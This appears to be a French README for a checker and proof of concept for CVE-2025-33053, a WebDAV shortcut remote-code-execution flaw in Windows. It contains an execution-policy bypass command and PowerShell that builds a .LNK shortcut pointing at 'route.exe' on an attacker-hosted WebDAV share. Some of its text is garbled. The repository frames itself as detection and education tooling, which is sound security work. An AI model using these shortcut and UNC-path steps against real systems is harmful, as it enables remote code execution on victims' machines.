
CVE-2025-33053 Vérificateur et PoC
Preuve du vérificateur
Preuve du PoC
Un ensemble complet d'outils pour vérifier et démontrer l'exploitation potentielle de CVE-2025-33053, une vulnérabilité critique d'exécution de code à distance (RCE) basée sur WebDAV affectant les systèmes Windows.
CVE-2025-33053 permet aux attaquants d'exploiter des fichiers de raccourci .LNK qui référencent des partages WebDAV distants malveillants, conduisant potentiellement à une exécution de code à distance (RCE) sur les systèmes affectés.
.LNK..LNK créé ou accès direct au chemin UNC — Pointe vers un chemin UNC distant comme :.LNK est accédé ou que le chemin UNC est parcouru manuellement (par exemple, via l'Explorateur de fichiers) :
CVE-2025-33053_checker.ps1)| Vérification | Objectif |
|---|---|
| 🔍 Statut du service WebClient | Confirme si le support WebDAV est actif et en cours d'exécution. |
| 🔍 Gestion des chemins UNC via Test-Path | Teste si le système résout les chemins UNC WebDAV distants (condition préalable clé pour l'exploitation CVE). |
Ouvrez PowerShell en tant qu'administrateur.
Si l'exécution de scripts est restreinte, exécutez :
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
python3 CVE-2025-33053_PoC.py --port 8000
Sur la machine cible :
\\<Kali-IP>@8000\DavWWWRoot\route.exe
\\<Kali-IP>@8000\DavWWWRoot\route.exe
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut("C:\Users\Public\CVE-2025-33053-Test.lnk")
$Shortcut.TargetPath = "\\<Kali-IP>@8000\DavWWWRoot\route.exe"
$Shortcut.Save()
Si la cible est vulnérable, le serveur PoC enregistrera :
[!] PROPFIND request received from <victim-ip> - Potential CVE-2025-33053 detected!
[!] Target system is VULNERABLE to CVE-2025-33053!
✔️ Utilise une résolution de chemin UNC réelle — pas de simulation. ✔️ Capture les requêtes PROPFIND réelles déclenchées par le système d'exploitation — comportement exact requis pour l'exploitation CVE. ✔️ Démontre une preuve réelle au niveau réseau de la vulnérabilité, sans exécuter de charges utiles ni causer de dommages.
Ce PoC n'exploite ni ne nuit au système cible — il détecte uniquement le comportement vulnérable sous-jacent. Destiné à être utilisé dans des environnements contrôlés ou avec une autorisation explicite. Démontre un comportement réel du système — pas une simulation factice. À utiliser uniquement à des fins éducatives. Ne pas exécuter sur des systèmes non autorisés.
Licence MIT — Gratuit à des fins éducatives, de recherche et défensives uniquement.
Les pull requests sont les bienvenues — améliorez la détection, ajoutez des fonctionnalités ou suggérez des correctifs.
Ce dépôt est uniquement destiné à la recherche en sécurité éducative et autorisée. L'utilisation abusive contre des systèmes que vous ne possédez pas ou pour lesquels vous n'avez pas l'autorisation de tester est strictement interdite.